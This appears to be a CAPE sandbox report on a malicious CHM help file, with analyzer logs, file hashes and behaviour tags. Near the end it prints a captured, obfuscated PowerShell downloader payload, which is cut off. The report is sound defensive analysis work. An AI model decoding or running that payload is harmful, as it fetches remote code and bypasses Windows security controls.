2025-12-09 07:10:11,187 [root] DEBUG: 920: DLL loaded at 0x000007FEFD2D0000: C:\Windows\system32\api-ms-win-downlevel-normaliz-l1-1-0 (0x3000 bytes).
2025-12-09 07:10:11,187 [root] DEBUG: 920: DLL loaded at 0x0000000077900000: C:\Windows\system32\normaliz (0x3000 bytes).
2025-12-09 07:10:11,187 [root] DEBUG: 920: DLL loaded at 0x000007FEFE190000: C:\Windows\system32\iertutil (0x2cc000 bytes).
2025-12-09 07:10:11,187 [root] DEBUG: 920: DLL loaded at 0x000007FEFD360000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l1-1-0 (0x5000 bytes).
2025-12-09 07:10:11,187 [root] DEBUG: 920: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\USERENV (0x1f000 bytes).
2025-12-09 07:10:11,187 [root] DEBUG: 920: DLL loaded at 0x000007FEFD2B0000: C:\Windows\system32\profapi (0xf000 bytes).
2025-12-09 07:10:11,187 [root] DEBUG: 920: DLL loaded at 0x000007FEFD330000: C:\Windows\system32\api-ms-win-downlevel-ole32-l1-1-0 (0x4000 bytes).
2025-12-09 07:10:11,203 [root] DEBUG: 920: DLL loaded at 0x000007FEFCEC0000: C:\Windows\system32\Secur32 (0xb000 bytes).
2025-12-09 07:10:11,203 [root] DEBUG: 920: DLL loaded at 0x000007FEFECB0000: C:\Windows\system32\SHELL32 (0xd8b000 bytes).
2025-12-09 07:10:11,203 [root] DEBUG: 920: DLL loaded at 0x000007FEF9A20000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0 (0x4000 bytes).
2025-12-09 07:10:11,218 [root] DEBUG: 920: DLL loaded at 0x000007FEF85C0000: C:\Windows\system32\winhttp (0x71000 bytes).
2025-12-09 07:10:11,218 [root] DEBUG: 920: DLL loaded at 0x000007FEF8550000: C:\Windows\system32\webio (0x65000 bytes).
2025-12-09 07:10:11,234 [root] DEBUG: 920: DLL loaded at 0x000007FEFC9F0000: C:\Windows\system32\mswsock (0x55000 bytes).
2025-12-09 07:10:11,234 [root] DEBUG: 920: DLL loaded at 0x000007FEFC9E0000: C:\Windows\System32\wship6 (0x7000 bytes).
2025-12-09 07:10:11,234 [root] DEBUG: 920: DLL loaded at 0x000007FEFAB40000: C:\Windows\system32\IPHLPAPI (0x27000 bytes).
2025-12-09 07:10:11,234 [root] DEBUG: 920: DLL loaded at 0x000007FEFABE0000: C:\Windows\system32\WINNSI (0xb000 bytes).
2025-12-09 07:10:12,531 [root] DEBUG: 2384: caller_dispatch: Added region at 0x00000000FF1E0000 to tracked regions list (ntdll::NtWaitForSingleObject returns to 0x00000000FF1E1318, thread 2304).
2025-12-09 07:10:12,531 [root] DEBUG: 2384: YaraScan: Scanning 0x00000000FF1E0000, size 0xa052
2025-12-09 07:10:12,531 [root] DEBUG: 2384: ProcessImageBase: Main module image at 0x00000000FF1E0000 unmodified (entropy change 0.000000e+00)
2025-12-09 07:10:14,859 [root] DEBUG: 556: OpenProcessHandler: Injection info created for process 1100, handle 0x4ac: C:\Windows\System32\schtasks.exe
2025-12-09 07:10:14,875 [root] DEBUG: 556: OpenProcessHandler: Injection info created for process 1232, handle 0x4ac: C:\Windows\System32\schtasks.exe
2025-12-09 07:10:14,890 [root] DEBUG: 556: OpenProcessHandler: Injection info created for process 3000, handle 0x4ac: C:\Windows\System32\schtasks.exe
2025-12-09 07:10:16,281 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
2025-12-09 07:10:16,296 [root] INFO: Process with pid 920 has terminated
2025-12-09 07:10:16,296 [root] DEBUG: 920: NtTerminateProcess hook: Attempting to dump process 920
2025-12-09 07:10:16,312 [root] DEBUG: 920: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-09 07:10:20,703 [root] DEBUG: 968: api-rate-cap: SwitchToThread hook disabled due to rate
2025-12-09 07:10:36,687 [root] DEBUG: 968: api-rate-cap: NtYieldExecution hook disabled due to rate
2025-12-09 07:10:37,109 [root] DEBUG: 556: OpenProcessHandler: Injection info created for process 2520, handle 0x5a0: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
2025-12-09 07:10:37,156 [root] DEBUG: 556: CreateProcessHandler: Injection info set for new process 2660: C:\Windows\system32\DllHost.exe, ImageBase: 0x00000000FFB00000
2025-12-09 07:10:37,156 [root] INFO: Announced 64-bit process name: dllhost.exe pid: 2660
2025-12-09 07:10:37,156 [lib.api.process] INFO: Monitor config for <Process 2660 dllhost.exe>: C:\tmpm1ij88hx\dll\2660.ini
2025-12-09 07:10:37,156 [lib.api.process] INFO: 64-bit DLL to inject is C:\tmpm1ij88hx\dll\tLhPYBFm.dll, loader C:\tmpm1ij88hx\bin\yaKgHGUf.exe
2025-12-09 07:10:37,187 [root] DEBUG: Loader: Injecting process 2660 (thread 2320) with C:\tmpm1ij88hx\dll\tLhPYBFm.dll.
2025-12-09 07:10:37,187 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-09 07:10:37,187 [root] DEBUG: Successfully injected DLL C:\tmpm1ij88hx\dll\tLhPYBFm.dll.
2025-12-09 07:10:37,187 [lib.api.process] INFO: Injected into 64-bit <Process 2660 dllhost.exe>
2025-12-09 07:10:37,187 [root] INFO: Announced 64-bit process name: dllhost.exe pid: 2660
2025-12-09 07:10:37,187 [lib.api.process] INFO: Monitor config for <Process 2660 dllhost.exe>: C:\tmpm1ij88hx\dll\2660.ini
2025-12-09 07:10:37,187 [lib.api.process] INFO: 64-bit DLL to inject is C:\tmpm1ij88hx\dll\tLhPYBFm.dll, loader C:\tmpm1ij88hx\bin\yaKgHGUf.exe
2025-12-09 07:10:37,203 [root] DEBUG: Loader: Injecting process 2660 (thread 2320) with C:\tmpm1ij88hx\dll\tLhPYBFm.dll.
2025-12-09 07:10:37,203 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-09 07:10:37,203 [root] DEBUG: Successfully injected DLL C:\tmpm1ij88hx\dll\tLhPYBFm.dll.
2025-12-09 07:10:37,203 [lib.api.process] INFO: Injected into 64-bit <Process 2660 dllhost.exe>
2025-12-09 07:10:37,218 [root] DEBUG: 2660: Python path set to 'C:\Python38'.
2025-12-09 07:10:37,218 [root] DEBUG: 2660: Dropped file limit defaulting to 100.
2025-12-09 07:10:37,218 [root] INFO: Disabling sleep skipping.
2025-12-09 07:10:37,218 [root] DEBUG: 2660: YaraInit: Compiled rules loaded from existing file C:\tmpm1ij88hx\data\yara\capemon.yac
2025-12-09 07:10:37,218 [root] DEBUG: 2660: YaraScan: Scanning 0x00000000FFB00000, size 0x6012
2025-12-09 07:10:37,234 [root] DEBUG: 2660: Monitor initialised: 64-bit capemon loaded in process 2660 at 0x000007FEF30B0000, thread 2320, image base 0x00000000FFB00000, stack from 0x0000000000125000-0x0000000000130000
2025-12-09 07:10:37,234 [root] DEBUG: 2660: Commandline: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
2025-12-09 07:10:37,249 [root] DEBUG: 2660: GetAddressByYara: ModuleBase 0x0000000077760000 FunctionName LdrpCallInitRoutine
2025-12-09 07:10:37,249 [root] WARNING: b'Unable to place hook on LockResource'
2025-12-09 07:10:37,249 [root] DEBUG: 2660: set_hooks: Unable to hook LockResource
2025-12-09 07:10:37,265 [root] DEBUG: 2660: Hooked 605 out of 606 functions
2025-12-09 07:10:37,265 [root] INFO: Loaded monitor into process with pid 2660
2025-12-09 07:10:37,265 [root] DEBUG: 2660: caller_dispatch: Added region at 0x00000000FFB00000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x00000000FFB011B5, thread 2320).
2025-12-09 07:10:37,265 [root] DEBUG: 2660: YaraScan: Scanning 0x00000000FFB00000, size 0x6012
2025-12-09 07:10:37,265 [root] DEBUG: 2660: ProcessImageBase: Main module image at 0x00000000FFB00000 unmodified (entropy change 0.000000e+00)
2025-12-09 07:10:37,265 [root] DEBUG: 2660: DLL loaded at 0x000007FEFD110000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2025-12-09 07:10:37,265 [root] DEBUG: 2660: DLL loaded at 0x000007FEFE7F0000: C:\Windows\system32\CLBCatQ (0x99000 bytes).
2025-12-09 07:10:37,265 [root] DEBUG: 2660: DLL loaded at 0x000007FEFEB70000: C:\Windows\system32\OLEAUT32 (0xdb000 bytes).
2025-12-09 07:10:37,281 [root] DEBUG: 2660: DLL loaded at 0x000007FEFCA50000: C:\Windows\system32\CRYPTSP (0x18000 bytes).
2025-12-09 07:10:37,281 [root] DEBUG: 2660: DLL loaded at 0x000007FEFC750000: C:\Windows\system32\rsaenh (0x47000 bytes).
2025-12-09 07:10:37,281 [root] DEBUG: 2660: DLL loaded at 0x000007FEFD200000: C:\Windows\system32\RpcRtRemote (0x14000 bytes).
2025-12-09 07:10:37,281 [root] DEBUG: 2660: DLL loaded at 0x000007FEFB9F0000: C:\Windows\system32\uxtheme (0x56000 bytes).
2025-12-09 07:10:37,281 [root] DEBUG: 2660: DLL loaded at 0x000007FEFDC70000: C:\Windows\System32\wininet (0x4ac000 bytes).
2025-12-09 07:10:37,281 [root] DEBUG: 2660: DLL loaded at 0x000007FEFD650000: C:\Windows\system32\api-ms-win-downlevel-user32-l1-1-0 (0x4000 bytes).
2025-12-09 07:10:37,281 [root] DEBUG: 2660: DLL loaded at 0x000007FEFD2E0000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0 (0x4000 bytes).
2025-12-09 07:10:37,296 [root] DEBUG: 2660: DLL loaded at 0x000007FEFD660000: C:\Windows\system32\api-ms-win-downlevel-version-l1-1-0 (0x4000 bytes).
2025-12-09 07:10:37,296 [root] DEBUG: 2660: DLL loaded at 0x000007FEFC390000: C:\Windows\system32\version (0xc000 bytes).
2025-12-09 07:10:37,296 [root] DEBUG: 2660: DLL loaded at 0x000007FEFD2D0000: C:\Windows\system32\api-ms-win-downlevel-normaliz-l1-1-0 (0x3000 bytes).
2025-12-09 07:10:37,296 [root] DEBUG: 2660: DLL loaded at 0x0000000077900000: C:\Windows\system32\normaliz (0x3000 bytes).
2025-12-09 07:10:37,296 [root] DEBUG: 2660: DLL loaded at 0x000007FEFE190000: C:\Windows\system32\iertutil (0x2cc000 bytes).
2025-12-09 07:10:37,296 [root] DEBUG: 2660: DLL loaded at 0x000007FEFD360000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l1-1-0 (0x5000 bytes).
2025-12-09 07:10:37,296 [root] DEBUG: 2660: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\USERENV (0x1f000 bytes).
2025-12-09 07:10:37,312 [root] DEBUG: 2660: DLL loaded at 0x000007FEFD2B0000: C:\Windows\system32\profapi (0xf000 bytes).
2025-12-09 07:10:37,312 [root] DEBUG: 2660: DLL loaded at 0x000007FEFD330000: C:\Windows\system32\api-ms-win-downlevel-ole32-l1-1-0 (0x4000 bytes).
2025-12-09 07:10:37,312 [root] DEBUG: 2660: DLL loaded at 0x000007FEFCEC0000: C:\Windows\system32\Secur32 (0xb000 bytes).
2025-12-09 07:10:37,312 [root] DEBUG: 2660: DLL loaded at 0x000007FEFECB0000: C:\Windows\system32\SHELL32 (0xd8b000 bytes).
2025-12-09 07:10:37,312 [root] DEBUG: 2660: DLL loaded at 0x000007FEF9A20000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0 (0x4000 bytes).
2025-12-09 07:10:37,328 [root] DEBUG: 2660: DLL loaded at 0x000007FEF85C0000: C:\Windows\system32\winhttp (0x71000 bytes).
2025-12-09 07:10:37,328 [root] DEBUG: 2660: DLL loaded at 0x000007FEF8550000: C:\Windows\system32\webio (0x65000 bytes).
2025-12-09 07:10:37,328 [root] DEBUG: 2660: DLL loaded at 0x000007FEFC9F0000: C:\Windows\system32\mswsock (0x55000 bytes).
2025-12-09 07:10:37,328 [root] DEBUG: 2660: DLL loaded at 0x000007FEFC9E0000: C:\Windows\System32\wship6 (0x7000 bytes).
2025-12-09 07:10:37,343 [root] DEBUG: 2660: DLL loaded at 0x000007FEFAB40000: C:\Windows\system32\IPHLPAPI (0x27000 bytes).
2025-12-09 07:10:37,343 [root] DEBUG: 2660: DLL loaded at 0x000007FEFABE0000: C:\Windows\system32\WINNSI (0xb000 bytes).
2025-12-09 07:10:42,328 [root] INFO: Process with pid 2660 has terminated
2025-12-09 07:10:42,328 [root] DEBUG: 2660: NtTerminateProcess hook: Attempting to dump process 2660
2025-12-09 07:10:42,328 [root] DEBUG: 2660: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-09 07:12:47,515 [root] INFO: Analysis timeout hit, terminating analysis
2025-12-09 07:12:47,515 [lib.api.process] INFO: Terminate event set for <Process 2492 hh.exe>
2025-12-09 07:12:47,515 [root] DEBUG: 2492: Terminate Event: Attempting to dump process 2492
2025-12-09 07:12:47,515 [root] DEBUG: 2492: VerifyCodeSection: Executable code does not match, 0xa0 of 0x1870 matching
2025-12-09 07:12:47,515 [root] DEBUG: 2492: DoProcessDump: Code modification detected, dumping Imagebase at 0x00000000FFBF0000.
2025-12-09 07:12:47,515 [root] DEBUG: 2492: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2025-12-09 07:12:47,515 [root] DEBUG: 2492: DumpProcess: Instantiating PeParser with address: 0x00000000FFBF0000.
2025-12-09 07:12:47,515 [root] DEBUG: 2492: DumpProcess: Module entry point VA is 0x0000000000001D30.
2025-12-09 07:12:47,515 [lib.common.results] INFO: Uploading file C:\STyimYXp\CAPE\2492_2111547122381122025 to procdump\229a16e1a614fb410abb3c5ac98dc616074f09a2ab06a10728b8372f87a5cdb3; Size is 18432; Max size: 100000000
2025-12-09 07:12:47,515 [root] DEBUG: 2492: DumpProcess: Module image dump success - dump size 0x4800.
2025-12-09 07:12:47,515 [root] DEBUG: 2492: Terminate Event: Current region 0x00000000021464F0
2025-12-09 07:12:47,515 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\~DFE4C0C9E922237CB3.TMP
2025-12-09 07:12:47,515 [lib.api.process] INFO: Termination confirmed for <Process 2492 hh.exe>
2025-12-09 07:12:47,515 [root] DEBUG: 2492: Terminate Event: CAPE shutdown complete for process 2492
2025-12-09 07:12:47,515 [root] INFO: Terminate event set for process 2492
2025-12-09 07:12:47,531 [lib.api.process] INFO: Terminate event set for <Process 968 powershell.exe>
2025-12-09 07:12:47,531 [root] DEBUG: 968: Terminate Event: Attempting to dump process 968
2025-12-09 07:12:47,531 [root] DEBUG: 968: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-09 07:12:47,531 [root] DEBUG: 968: DumpInterestingRegions: Dumping .NET JIT native cache at 0x000007FE8FC90000.
2025-12-09 07:12:47,531 [lib.common.results] INFO: Uploading file C:\STyimYXp\CAPE\968_2177147122381122025 to CAPE\1e669c21f786c23be96c1a1b3283f48f194d94fdb6c5e4c1e1f063ee46646e2b; Size is 42825; Max size: 100000000
2025-12-09 07:12:47,531 [root] DEBUG: 968: DumpMemory: Payload successfully created: C:\STyimYXp\CAPE\968_2177147122381122025 (size 42825 bytes)
2025-12-09 07:12:47,531 [root] DEBUG: 968: DumpInterestingRegions: Dumping .NET JIT native cache at 0x000007FE8FD60000.
2025-12-09 07:12:47,531 [lib.common.results] INFO: Uploading file C:\STyimYXp\CAPE\968_980597747122381122025 to CAPE\7351acf7b761f49bc7ca74842e91ea2ce3e51e95da922c0d0b9c9928f92746dc; Size is 18362; Max size: 100000000
2025-12-09 07:12:47,531 [root] DEBUG: 968: DumpMemory: Payload successfully created: C:\STyimYXp\CAPE\968_980597747122381122025 (size 18362 bytes)
2025-12-09 07:12:47,531 [root] DEBUG: 968: Terminate Event: Current region 0x000000000204DFB0
2025-12-09 07:12:47,531 [root] DEBUG: 968: DumpPEsInRange: Scanning range 0x000007FE8FD40000 - 0x000007FE8FD4018C.
2025-12-09 07:12:47,531 [root] DEBUG: 968: ScanForDisguisedPE: Size too small: 0x18c bytes
2025-12-09 07:12:47,531 [lib.common.results] INFO: Uploading file C:\STyimYXp\CAPE\968_336335447122381122025 to CAPE\5e231a9575d92a396d4b4a56988b3093461f6632a4fb4a6442211677f36ed6ac; Size is 396; Max size: 100000000
2025-12-09 07:12:47,546 [root] DEBUG: 968: DumpMemory: Payload successfully created: C:\STyimYXp\CAPE\968_336335447122381122025 (size 396 bytes)
2025-12-09 07:12:47,546 [root] DEBUG: 968: DumpRegion: Dumped entire allocation from 0x000007FE8FD40000, size 4096 bytes.
2025-12-09 07:12:47,546 [root] DEBUG: 968: ProcessTrackedRegion: Dumped region at 0x000007FE8FD40000.
2025-12-09 07:12:47,546 [root] DEBUG: 968: YaraScan: Scanning 0x000007FE8FD40000, size 0x18c
2025-12-09 07:12:47,546 [root] INFO: Added new file to list with pid None and path C:\PSTranscripts\20251209\PowerShell_transcript.USERDUM-8A61A1P.o3rz6VZb.20251209170730.txt
2025-12-09 07:12:47,546 [lib.api.process] INFO: Termination confirmed for <Process 968 powershell.exe>
2025-12-09 07:12:47,546 [root] DEBUG: 968: Terminate Event: CAPE shutdown complete for process 968
2025-12-09 07:12:47,546 [root] INFO: Terminate event set for process 968
2025-12-09 07:12:47,546 [lib.api.process] INFO: Terminate event set for <Process 556 svchost.exe>
2025-12-09 07:12:47,546 [root] DEBUG: 556: Terminate Event: Attempting to dump process 556
2025-12-09 07:12:47,546 [root] DEBUG: 556: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-09 07:12:47,546 [root] DEBUG: 556: Terminate Event: Current region empty
2025-12-09 07:12:47,546 [root] DEBUG: 556: Terminate Event: CAPE shutdown complete for process 556
2025-12-09 07:12:47,546 [lib.api.process] INFO: Termination confirmed for <Process 556 svchost.exe>
2025-12-09 07:12:47,546 [root] INFO: Terminate event set for process 556
2025-12-09 07:12:47,546 [lib.api.process] INFO: Terminate event set for <Process 2384 svchost.exe>
2025-12-09 07:12:47,546 [root] DEBUG: 2384: Terminate Event: Attempting to dump process 2384
2025-12-09 07:12:47,546 [root] DEBUG: 2384: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-09 07:12:47,546 [root] DEBUG: 2384: Terminate Event: Current region empty
2025-12-09 07:12:47,546 [lib.api.process] INFO: Termination confirmed for <Process 2384 svchost.exe>
2025-12-09 07:12:47,546 [root] DEBUG: 2384: Terminate Event: CAPE shutdown complete for process 2384
2025-12-09 07:12:47,546 [root] INFO: Terminate event set for process 2384
2025-12-09 07:12:47,546 [lib.api.process] INFO: Terminate event set for <Process 1144 WmiPrvSE.exe>
2025-12-09 07:12:47,546 [root] DEBUG: 1144: Terminate Event: Attempting to dump process 1144
2025-12-09 07:12:47,546 [root] DEBUG: 1144: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-09 07:12:47,546 [root] DEBUG: 1144: Terminate Event: Current region empty
2025-12-09 07:12:47,546 [root] DEBUG: 1144: Terminate Event: Shutdown complete for process 1144 but failed to inform analyzer.
2025-12-09 07:12:52,546 [lib.api.process] INFO: Termination confirmed for <Process 1144 WmiPrvSE.exe>
2025-12-09 07:12:52,546 [root] INFO: Terminate event set for process 1144
2025-12-09 07:12:52,546 [root] INFO: Created shutdown mutex
2025-12-09 07:12:53,546 [root] INFO: Shutting down package
2025-12-09 07:12:53,546 [root] INFO: Stopping auxiliary modules
2025-12-09 07:12:53,546 [root] INFO: Stopping auxiliary module: Browser
2025-12-09 07:12:53,546 [root] INFO: Stopping auxiliary module: Curtain
2025-12-09 07:12:53,593 [lib.common.results] INFO: Uploading file C:\curtain.log to curtain/1765235573.59375.curtain.log; Size is 17152; Max size: 100000000
2025-12-09 07:12:53,593 [root] INFO: Stopping auxiliary module: End_noisy_tasks
2025-12-09 07:12:53,593 [root] INFO: Stopping auxiliary module: Evtx
2025-12-09 07:12:53,609 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\Application.evtx to zip dump
2025-12-09 07:12:53,609 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\HardwareEvents.evtx to zip dump
2025-12-09 07:12:53,609 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\Internet Explorer.evtx to zip dump
2025-12-09 07:12:53,609 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\Key Management Service.evtx to zip dump
2025-12-09 07:12:53,609 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\Microsoft-Windows-Sysmon%4Operational.evtx to zip dump
2025-12-09 07:12:53,625 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\OAlerts.evtx to zip dump
2025-12-09 07:12:53,625 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\Security.evtx to zip dump
2025-12-09 07:12:53,625 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\Setup.evtx to zip dump
2025-12-09 07:12:53,625 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\System.evtx to zip dump
2025-12-09 07:12:53,625 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\Windows PowerShell.evtx to zip dump
2025-12-09 07:12:53,640 [modules.auxiliary.evtx] DEBUG: Uploading evtx.zip to host
2025-12-09 07:12:53,640 [lib.common.results] INFO: Uploading file evtx.zip to evtx/evtx.zip; Size is 102001; Max size: 100000000
2025-12-09 07:12:53,640 [root] INFO: Stopping auxiliary module: Human
2025-12-09 07:12:55,312 [root] INFO: Stopping auxiliary module: Pre_script
2025-12-09 07:12:55,312 [root] INFO: Stopping auxiliary module: Screenshots
2025-12-09 07:12:57,328 [root] INFO: Stopping auxiliary module: Usage
2025-12-09 07:12:57,421 [root] INFO: Stopping auxiliary module: During_script
2025-12-09 07:12:57,421 [root] INFO: Finishing auxiliary modules
2025-12-09 07:12:57,421 [root] INFO: Shutting down pipe server and dumping dropped files
2025-12-09 07:12:57,421 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Roaming\Microsoft\HTML Help\hh.dat to files\47e64f4f7dec1b1f7cab02afcbbbd9d1124accb737b0f977730b719bd412c0d4; Size is 8590; Max size: 100000000
2025-12-09 07:12:57,421 [lib.common.results] INFO: Uploading file c:\users\user\appdata\roaming\microsoft\windows\recent\customdestinations\590aee7bdd69b59b.customdestinations-ms to files\24f5753894a374d1aceb657759d95b0f8ed93527675cf4f8ffb754a62a34d1f8; Size is 6066; Max size: 100000000
2025-12-09 07:12:57,421 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat to files\0816f543db6a9b076c3a78b6e6c3e515078a78af28306f70a9a3d0616febc23c; Size is 128; Max size: 100000000
2025-12-09 07:12:57,421 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\~DFE4C0C9E922237CB3.TMP to files\205d000aa762f3a96ac3ad4b25d791b5f7fc8efb9056b78f299f671a02b9fd21; Size is 16384; Max size: 100000000
2025-12-09 07:12:57,421 [lib.common.results] INFO: Uploading file C:\PSTranscripts\20251209\PowerShell_transcript.USERDUM-8A61A1P.o3rz6VZb.20251209170730.txt to files\62e90229d712ff7f225935e514bf7ab3af5de1d46d333e8013a0a09a61c8e3df; Size is 4944; Max size: 100000000
2025-12-09 07:12:57,421 [root] WARNING: Folder at path "C:\STyimYXp\debugger" does not exist, skipping
2025-12-09 07:12:57,421 [root] WARNING: Folder at path "C:\STyimYXp\tlsdump" does not exist, skipping
2025-12-09 07:12:57,421 [root] INFO: Analysis completed


    

    

        

    

    

        

    

    

        

    





    

        

            

                
Machine

            
                
            

                

                    
                        

                            Name
                            Label
                            Manager
                            Started On
                            Shutdown On
                            
                                Route
                            
                        

                    
                    
                        

                            win7-64bit-1
                            win7-64bit-1
                            KVM
                            2025-12-09 15:09:38
                            2025-12-09 15:13:05
                            
                                inetsim
                            
                        

                    
                

            

        

    





    
File Details   

    
    



    


        

        
        
        

            File Name
            
                
                
5f11baf452c0d7cbb25c.chm

                
            		
        

        
            

                File Type
                MS Windows HtmlHelp Data
            

        
        
        

            File Size
            11878 bytes
        

        
        
            
            
                
                
                
            
        
        

            MD5
            a92ce13e5f122e96c2388339be7d929b
        

        

            SHA1
            409067ddca98e02b7e785760a104a178c9fa0292
        

        

            SHA256
            5f11baf452c0d7cbb25c232ca09de760fa56253f72e5c2dbc1164a2c347459d5
                [VT]
                [MWDB]
                [Bazaar]
            
        

        
        

            SHA3-384
            8571ebf21983f4f3427f50b6a86e970f04759a3ff5bf82d0c6096e0ae8d980f5b965dbfa00209db689fb40c2ecaef302
        

        
        
        

            CRC32
            D34E04F4
        

        
        

            TLSH
            T1AF324C6033900620DE9E17385FE5EB837544B8612FA49366831EC7BF1DEBF0C276499A
        

        
        

            Ssdeep
            96:ryecfn9LvAck1BOtENGdrOiNHap226m8fNEijkSc6ErB:ryeY9bAcJECOX2LvNEijVcz1
        

        
        
        
        

        

        
        

            
                
                
                
                
                
                
                
                
                
            
            
                
                 
                 File
                
                
                    
                        
                    
                
                
                
                
                    
                     BinGraph
                    
                
                
                
                    
                         Vba2Graph
                    
                
                
                
                
                
                
                
            
        

        
    


        
        
        

        
        
            
                
                

                    

                    
                        
::DataSpace/NameList

                    
                        
_&f"N

                    
                        
/$WWKeywordLinks/

                    
                        
MSCompressed

                    
                        
Px,A{

                    
                        
/#ITBITS

                    
                        
/#TOPICS

                    
                        
u7fgvh0

                    
                        
/#URLSTR

                    
                        
&m$za

                    
                        
2qx:Zj

                    
                        
/$OBJINST

                    
                        
/#SYSTEM

                    
                        
kZPjv

                    
                        
/#URLTBL

                    
                        
HHA Version 4.74.8702

                    
                        
i::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/ResetTable

                    
                        
/$WWKeywordLinks/Property

                    
                        
j;s&c[

                    
                        
/#STRINGS

                    
                        
2}v2g

                    
                        
)::DataSpace/Storage/MSCompressed/SpanInfo

                    
                        
/$WWAssociativeLinks/Property

                    
                        
fsdfdsf.htm

                    
                        
/#IDXHDR

                    
                        
<&_::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/

                    
                        
Uncompressed

                    
                        
<(::DataSpace/Storage/MSCompressed/Content

                    
                        
/::DataSpace/Storage/MSCompressed/Transform/List

                    
                        
<9t~I

                    
                        
/$FIftiMain

                    
                        
PMGLF

                    
                        
9*HZO

                    
                        
:i-NP

                    
                        
/fsdfdsf.htm

                    
                        
f,::DataSpace/Storage/MSCompressed/ControlData

                    
                        
@LEX@U"

                    
                        
LATIA

                    
                        
kQo'e

                    
                        
>2c@M

                    
                        
D8#"E

                    
                        
{7FC28940-9D31-11D0

                    
                        
/$WWAssociativeLinks/

                    
                    

                

            
            
        
        
        
        
        
    
    
    
    
    
    
    
    
    
    
    
    







    

        
        

            

     Reports:
            
                JSON 
            
            
                HTML
            
            
            
            
            
            
            
            
               Lite
            
            
   




        

        
    







    

    



    
(?)





    

        

            

                

                    

                        
                        

                            

                                
                                    
                                    

                                        

                                            PID: 968 - 
                                            Downloader
                                            
                                            Starts Process
                                            
                                            Compression
                                            
                                            Uses Stealth
                                            
                                            Screen Scraping
                                            
                                            Custom Web Fields
                                            
                                            Sleeps
                                            
                                            Uninstalls Apps
                                            
                                            Obfuscation
                                            
                                            Enumeration/Profiling
                                            
                                            Sends Data
                                            
                                            AppLocker Bypass
                                            
                                            AMSI Bypass
                                            
                                            Disables Windows Defender
                                            
                                            Clear Logs
                                            
                                            Invokes C# .NET Assemblies
                                            
                                            Modifies Shadowcopy
                                            
                                        

                                        

                                             
                                            Event: 01
                                            
$biLMH='D4@C7@72@72@02@E6@96@F6@A6@D2@02@37@27@16@86@34@96@96@36@37@16@42@02@D3@76@E6@96@27@47@35@96@96@36@37@16@42@B3@D7@22@F5@42@87@03@22@D5@56@47@97@26@B5@D5@27@16@86@36@B5@B7@02@47@36@56@A6@26@F4@D2@86@36@16@54@27@F6@64@C7@02@72@32@72@02@47@96@C6@07@37@D2@02@67@D6@42@02@D3@37@27@16@86@34@96@96@36@37@16@42@B3@92@72@76@07@A6@E2@05@73@F2@F6@27@E2@47@27@56@36@37@57@C6@07@F2@F2@A3@07@47@47@86@72@C2@46@F6@86@47@56@D4@A3@A3@D5@56@07@97@45@C6@C6@16@34@E2@36@96@37@16@24@C6@16@57@37@96@65@E2@47@66@F6@37@F6@27@36@96@D4@B5@C2@72@76@E6@96@27@47@35@46@16@F6@C6@E6@77@F6@44@72@C2@97@47@47@42@82@56@D6@16@E6@97@24@C6@C6@16@34@A3@A3@D5@E6@F6@96@47@36@16@27@56@47@E6@94@E2@36@96@37@16@24@C6@16@57@37@96@65@E2@47@66@F6@37@F6@27@36@96@D4@B5@02@D3@67@D6@42@B3@92@72@36@96@37@16@24@C6@16@57@37@96@65@E2@47@66@F6@37@F6@27@36@96@D4@72@82@56@D6@16@E4@C6@16@96@47@27@16@05@86@47@96@75@46@16@F6@C4@A3@A3@D5@97@C6@26@D6@56@37@37@14@E2@E6@F6@96@47@36@56@C6@66@56@25@E2@D6@56@47@37@97@35@B5@02@D5@46@96@F6@67@B5@B3@D4@C7@72@92@47@E6@56@72@B2@72@96@C6@34@26@72@B2@72@56@75@E2@47@72@B2@72@56@E4@02@47@36@72@B2@72@56@A6@26@F4@72@B2@72@D2@77@56@E4@82@72@D3@97@47@47@42@B3@23@23@07@42@02@D3@02@C6@F6@36@F6@47@F6@27@05@97@47@96@27@57@36@56@35@A3@A3@D5@27@56@76@16@E6@16@D4@47@E6@96@